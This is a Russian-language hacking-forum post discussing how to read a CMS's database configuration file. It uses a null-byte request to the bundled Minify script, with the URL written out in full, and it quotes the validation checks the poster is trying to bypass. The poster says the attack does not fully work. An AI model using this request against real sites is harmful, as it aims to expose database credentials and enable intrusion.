Показать сообщение отдельно

  #2  
Старый 21.11.2013, 19:22
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

В общем, по последней дырке такая песня:

Запрос (GET):

Код HTML:
/engine/classes/min/index.php?f=engine/data/dbconfig.php
Обработчик, который всё обламывает:

engine\classes\min\lib\Minify\Controller\MinApp.ph p

А конкретно две проверки:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^[^,]+\\.(css|js)(?:,[^,]+\\.\\1)*$/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]])[/COLOR][/COLOR
и

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]realpath[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])[/COLOR][/COLOR
Судя по описанию патча с целсофта запрос должен быть примерно такой:

Код HTML:
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
Регулярка обеспечивается .js, путь null byte..

описание атаки

Но чёт не доконца катит... Кстати, .htaccess, что в дирах /cache/system не позволят прочитать файл удалённо....

Так что это так, больше для развития, или пока не убьёшь эти файлы.

PS и ещё не получается обойти проверку (обратный слэш):

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'\\'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
PSPS И самое интересное: гугл уже в июле это обсуждал ... Участники группы так и не смогли заюзать уязвимость
 
Ответить с цитированием